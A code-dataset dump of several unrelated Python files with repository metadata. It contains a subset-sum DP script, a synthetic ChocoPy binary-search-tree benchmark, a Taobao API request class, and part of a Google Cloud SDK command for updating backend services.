return dp[-1]
print(combination_sum_optimize_bottom_up([1,2,3,7], 6))
|
[
"[email protected]"
] | |
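The four implementations above should agree on every input; here is a minimal cross-check sketch (added for illustration -- it assumes the four functions above are in scope, e.g. appended to the same file):
import itertools

def subset_sum_oracle(num, target):
    # Exhaustive oracle: tries every subset, only viable for tiny inputs.
    return any(sum(c) == target
               for r in range(len(num) + 1)
               for c in itertools.combinations(num, r))

for nums, s in [([1, 2, 3, 7], 6), ([1, 3, 4, 8], 6), ([2, 4], 7)]:
    expected = subset_sum_oracle(nums, s)
    assert (combination_sum_brute_force(nums, s) == 1) == expected
    assert (combination_sum_top_down_memo(nums, s) == 1) == expected
    assert bool(combination_sum_bottom_up(nums, s)) == expected
    assert bool(combination_sum_optimize_bottom_up(nums, s)) == expected
print("all implementations agree")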
0f96edf164bfcaa85f71e6aa56f0b0d63472581a
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/tree-big-3528.py
|
2c12f2b79fef7e2608f8c704ed0cd7081df25e8e
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 23,291 |
py
|
# Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
                self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
|
[
"[email protected]"
] | |
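The classes above are machine-generated size variants for a compiler benchmark; only the Tree/TreeNode pair carries distinct binary-search-tree logic. A minimal usage sketch of that pair (illustrative only):
t = Tree()
for v in [8, 3, 10, 1, 6]:
    t.insert(v)        # inserting a duplicate returns False and leaves size unchanged
print(t.size)          # 5
print(t.contains(6))   # True
print(t.contains(7))   # False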
62f3947d4ae61f1cc720aa085837534f53774018
|
e1b8fb9a5500516f28d3d7e9a5f259c49ef35f14
|
/top/api/rest/InventoryAdjustTradeRequest.py
|
4da3e858af12147c95f9d7d992b46d0d33f834f9
|
[] |
no_license
|
htom78/taobao_comet_py
|
9224dbca1a413a54bcc5569873e4c7a9fc9ba059
|
ad8b2e983a14d3ab7665244449f79dd72f390815
|
refs/heads/master
| 2020-05-17T10:47:28.369191 | 2013-08-27T08:50:59 | 2013-08-27T08:50:59 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 406 |
py
|
'''
Created by auto_sdk on 2013-06-16 16:36:02
'''
from top.api.base import RestApi
class InventoryAdjustTradeRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.biz_unique_code = None
self.items = None
self.operate_time = None
self.tb_order_type = None
def getapiname(self):
return 'taobao.inventory.adjust.trade'
|
[
"[email protected]"
] | |
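A usage sketch for the generated request class above; the field values are placeholders, and the final send step depends on the top SDK runtime, so it is only hinted at:
req = InventoryAdjustTradeRequest()
req.biz_unique_code = "ORDER-0001"   # placeholder business id
req.operate_time = "2013-06-16 16:36:02"
req.tb_order_type = "B2C"            # placeholder order type
print(req.getapiname())              # taobao.inventory.adjust.trade
# resp = req.getResponse(session)    # assumed top-SDK call; not verified here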
0b26e25eaff5eb07e0f7ffca2f3c21ca70e5b883
|
d83fde3c891f44014f5339572dc72ebf62c38663
|
/_bin/google-cloud-sdk/.install/.backup/lib/surface/compute/backend_services/update.py
|
5ac0c70891053536c799b46d3a0388628a07d629
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
gyaresu/dotfiles
|
047cc3ca70f4b405ba272856c69ee491a79d2ebe
|
e5e533b3a081b42e9492b228f308f6833b670cfe
|
refs/heads/master
| 2022-11-24T01:12:49.435037 | 2022-11-01T16:58:13 | 2022-11-01T16:58:13 | 17,139,657 | 1 | 1 | null | 2020-07-25T14:11:43 | 2014-02-24T14:59:59 |
Python
|
UTF-8
|
Python
| false | false | 19,001 |
py
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Commands for updating backend services.
There are separate alpha, beta, and GA command classes in this file.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from apitools.base.py import encoding
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute.backend_services import (
client as backend_service_client)
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute import signed_url_flags
from googlecloudsdk.command_lib.compute.backend_services import backend_services_utils
from googlecloudsdk.command_lib.compute.backend_services import flags
from googlecloudsdk.command_lib.compute.security_policies import (
flags as security_policy_flags)
from googlecloudsdk.core import log
from googlecloudsdk.core import resources as resources_exceptions
def AddIapFlag(parser):
# TODO(b/34479878): It would be nice if the auto-generated help text were
# a bit better so we didn't need to be quite so verbose here.
flags.AddIap(
parser,
help="""\
Change the Identity Aware Proxy (IAP) service configuration for the
backend service. You can set IAP to 'enabled' or 'disabled', or modify
the OAuth2 client configuration (oauth2-client-id and
oauth2-client-secret) used by IAP. If any fields are unspecified, their
values will not be modified. For instance, if IAP is enabled,
'--iap=disabled' will disable IAP, and a subsequent '--iap=enabled' will
then enable it with the same OAuth2 client configuration as the first
time it was enabled. See
https://cloud.google.com/iap/ for more information about this feature.
""")
@base.ReleaseTracks(base.ReleaseTrack.GA)
class UpdateGA(base.UpdateCommand):
"""Update a backend service.
*{command}* is used to update backend services.
"""
HEALTH_CHECK_ARG = None
HTTP_HEALTH_CHECK_ARG = None
HTTPS_HEALTH_CHECK_ARG = None
@classmethod
def Args(cls, parser):
flags.GLOBAL_REGIONAL_BACKEND_SERVICE_ARG.AddArgument(
parser, operation_type='update')
flags.AddDescription(parser)
cls.HEALTH_CHECK_ARG = flags.HealthCheckArgument()
cls.HEALTH_CHECK_ARG.AddArgument(parser, cust_metavar='HEALTH_CHECK')
cls.HTTP_HEALTH_CHECK_ARG = flags.HttpHealthCheckArgument()
cls.HTTP_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTP_HEALTH_CHECK')
cls.HTTPS_HEALTH_CHECK_ARG = flags.HttpsHealthCheckArgument()
cls.HTTPS_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTPS_HEALTH_CHECK')
flags.AddTimeout(parser, default=None)
flags.AddPortName(parser)
flags.AddProtocol(parser, default=None)
flags.AddEnableCdn(parser, default=None)
flags.AddSessionAffinity(parser, internal_lb=True)
flags.AddAffinityCookieTtl(parser)
flags.AddConnectionDrainingTimeout(parser)
flags.AddCacheKeyIncludeProtocol(parser, default=None)
flags.AddCacheKeyIncludeHost(parser, default=None)
flags.AddCacheKeyIncludeQueryString(parser, default=None)
flags.AddCacheKeyQueryStringList(parser)
AddIapFlag(parser)
def _CreateSetSecurityPoliciesRequest(self, client, backend_service_ref,
security_policy_ref):
backend_service = backend_service_client.BackendService(
backend_service_ref, compute_client=client)
return backend_service.SetSecurityPolicy(
security_policy=security_policy_ref, only_generate_request=True)
def GetGetRequest(self, client, backend_service_ref):
"""Create Backend Services get request."""
if backend_service_ref.Collection() == 'compute.regionBackendServices':
return (
client.apitools_client.regionBackendServices,
'Get',
client.messages.ComputeRegionBackendServicesGetRequest(
project=backend_service_ref.project,
region=backend_service_ref.region,
backendService=backend_service_ref.Name()))
return (
client.apitools_client.backendServices,
'Get',
client.messages.ComputeBackendServicesGetRequest(
project=backend_service_ref.project,
backendService=backend_service_ref.Name()))
def GetSetRequest(self, client, backend_service_ref, replacement):
"""Create Backend Services set request."""
if backend_service_ref.Collection() == 'compute.regionBackendServices':
return (
client.apitools_client.regionBackendServices,
'Update',
client.messages.ComputeRegionBackendServicesUpdateRequest(
project=backend_service_ref.project,
region=backend_service_ref.region,
backendService=backend_service_ref.Name(),
backendServiceResource=replacement))
return (
client.apitools_client.backendServices,
'Update',
client.messages.ComputeBackendServicesUpdateRequest(
project=backend_service_ref.project,
backendService=backend_service_ref.Name(),
backendServiceResource=replacement))
def Modify(self, client, resources, args, existing):
"""Modify Backend Service."""
replacement = encoding.CopyProtoMessage(existing)
if args.connection_draining_timeout is not None:
replacement.connectionDraining = client.messages.ConnectionDraining(
drainingTimeoutSec=args.connection_draining_timeout)
if args.description:
replacement.description = args.description
elif args.description is not None:
replacement.description = None
health_checks = flags.GetHealthCheckUris(args, self, resources)
if health_checks:
replacement.healthChecks = health_checks
if args.timeout:
replacement.timeoutSec = args.timeout
if args.port_name:
replacement.portName = args.port_name
if args.protocol:
replacement.protocol = (client.messages.BackendService
.ProtocolValueValuesEnum(args.protocol))
if args.enable_cdn is not None:
replacement.enableCDN = args.enable_cdn
if args.session_affinity is not None:
replacement.sessionAffinity = (
client.messages.BackendService.SessionAffinityValueValuesEnum(
args.session_affinity))
if args.affinity_cookie_ttl is not None:
replacement.affinityCookieTtlSec = args.affinity_cookie_ttl
backend_services_utils.ApplyCdnPolicyArgs(
client, args, replacement, is_update=True)
self._ApplyIapArgs(client, args.iap, existing, replacement)
return replacement
def ValidateArgs(self, args):
"""Validate arguments."""
if not any([
args.affinity_cookie_ttl is not None,
args.connection_draining_timeout is not None,
args.description is not None,
args.enable_cdn is not None,
args.cache_key_include_protocol is not None,
args.cache_key_include_host is not None,
args.cache_key_include_query_string is not None,
args.cache_key_query_string_whitelist is not None,
args.cache_key_query_string_blacklist is not None,
args.health_checks,
args.http_health_checks,
args.https_health_checks,
args.IsSpecified('iap'),
args.port_name,
args.protocol,
args.session_affinity is not None,
args.timeout is not None,
]):
raise exceptions.ToolException('At least one property must be modified.')
def Run(self, args):
"""Issues requests necessary to update the Backend Services."""
self.ValidateArgs(args)
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
client = holder.client
backend_service_ref = (
flags.GLOBAL_REGIONAL_BACKEND_SERVICE_ARG.ResolveAsResource(
args,
holder.resources,
scope_lister=compute_flags.GetDefaultScopeLister(client)))
get_request = self.GetGetRequest(client, backend_service_ref)
objects = client.MakeRequests([get_request])
new_object = self.Modify(client, holder.resources, args, objects[0])
# If existing object is equal to the proposed object or if
# Modify() returns None, then there is no work to be done, so we
# print the resource and return.
if objects[0] == new_object:
# Only skip push if security_policy is not set.
if getattr(args, 'security_policy', None) is None:
log.status.Print(
'No change requested; skipping update for [{0}].'.format(
objects[0].name))
return objects
requests = []
else:
requests = [self.GetSetRequest(client, backend_service_ref, new_object)]
# Empty string is a valid value.
if getattr(args, 'security_policy', None) is not None:
try:
security_policy_ref = self.SECURITY_POLICY_ARG.ResolveAsResource(
args, holder.resources).SelfLink()
# If security policy is an empty string we should clear the current policy
except resources_exceptions.InvalidResourceException:
security_policy_ref = None
requests += self._CreateSetSecurityPoliciesRequest(
client, backend_service_ref, security_policy_ref)
return client.MakeRequests(requests)
def _ApplyIapArgs(self, client, iap_arg, existing, replacement):
if iap_arg is not None:
existing_iap = existing.iap
replacement.iap = backend_services_utils.GetIAP(
iap_arg, client.messages, existing_iap_settings=existing_iap)
if replacement.iap.enabled and not (existing_iap and
existing_iap.enabled):
log.warning(backend_services_utils.IapBestPracticesNotice())
if (replacement.iap.enabled and replacement.protocol is not
client.messages.BackendService.ProtocolValueValuesEnum.HTTPS):
log.warning(backend_services_utils.IapHttpWarning())
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class UpdateAlpha(UpdateGA):
"""Update a backend service.
*{command}* is used to update backend services.
"""
HEALTH_CHECK_ARG = None
HTTP_HEALTH_CHECK_ARG = None
HTTPS_HEALTH_CHECK_ARG = None
SECURITY_POLICY_ARG = None
@classmethod
def Args(cls, parser):
flags.GLOBAL_REGIONAL_BACKEND_SERVICE_ARG.AddArgument(
parser, operation_type='update')
flags.AddDescription(parser)
cls.HEALTH_CHECK_ARG = flags.HealthCheckArgument()
cls.HEALTH_CHECK_ARG.AddArgument(parser, cust_metavar='HEALTH_CHECK')
cls.HTTP_HEALTH_CHECK_ARG = flags.HttpHealthCheckArgument()
cls.HTTP_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTP_HEALTH_CHECK')
cls.HTTPS_HEALTH_CHECK_ARG = flags.HttpsHealthCheckArgument()
cls.HTTPS_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTPS_HEALTH_CHECK')
cls.SECURITY_POLICY_ARG = (
security_policy_flags.SecurityPolicyArgumentForTargetResource(
resource='backend service'))
cls.SECURITY_POLICY_ARG.AddArgument(parser)
flags.AddTimeout(parser, default=None)
flags.AddPortName(parser)
flags.AddProtocol(
parser,
default=None,
choices=['HTTP', 'HTTPS', 'HTTP2', 'SSL', 'TCP', 'UDP'])
flags.AddConnectionDrainingTimeout(parser)
flags.AddEnableCdn(parser, default=None)
flags.AddCacheKeyIncludeProtocol(parser, default=None)
flags.AddCacheKeyIncludeHost(parser, default=None)
flags.AddCacheKeyIncludeQueryString(parser, default=None)
flags.AddCacheKeyQueryStringList(parser)
flags.AddSessionAffinity(parser, internal_lb=True)
flags.AddAffinityCookieTtl(parser)
signed_url_flags.AddSignedUrlCacheMaxAge(
parser, required=False, unspecified_help='')
flags.AddConnectionDrainOnFailover(parser, default=None)
flags.AddDropTrafficIfUnhealthy(parser, default=None)
flags.AddFailoverRatio(parser)
AddIapFlag(parser)
flags.AddCustomRequestHeaders(parser, remove_all_flag=True, default=None)
def Modify(self, client, resources, args, existing):
"""Modify Backend Service."""
replacement = super(UpdateAlpha, self).Modify(client, resources, args,
existing)
if args.connection_draining_timeout is not None:
replacement.connectionDraining = client.messages.ConnectionDraining(
drainingTimeoutSec=args.connection_draining_timeout)
if args.no_custom_request_headers is not None:
replacement.customRequestHeaders = []
if args.custom_request_header is not None:
replacement.customRequestHeaders = args.custom_request_header
backend_services_utils.ApplyCdnPolicyArgs(
client,
args,
replacement,
is_update=True,
apply_signed_url_cache_max_age=True)
backend_services_utils.ApplyFailoverPolicyArgs(client.messages, args,
replacement)
return replacement
def ValidateArgs(self, args):
"""Validate arguments."""
if not any([
args.affinity_cookie_ttl is not None,
args.connection_draining_timeout is not None,
args.no_custom_request_headers is not None,
args.custom_request_header is not None,
args.description is not None,
args.enable_cdn is not None,
args.cache_key_include_protocol is not None,
args.cache_key_include_host is not None,
args.cache_key_include_query_string is not None,
args.cache_key_query_string_whitelist is not None,
args.cache_key_query_string_blacklist is not None,
args.IsSpecified('signed_url_cache_max_age'),
args.http_health_checks,
args.IsSpecified('iap'),
args.port_name,
args.protocol,
args.security_policy is not None,
args.session_affinity is not None,
args.timeout is not None,
args.connection_drain_on_failover is not None,
args.drop_traffic_if_unhealthy is not None,
args.failover_ratio,
getattr(args, 'health_checks', None),
getattr(args, 'https_health_checks', None),
]):
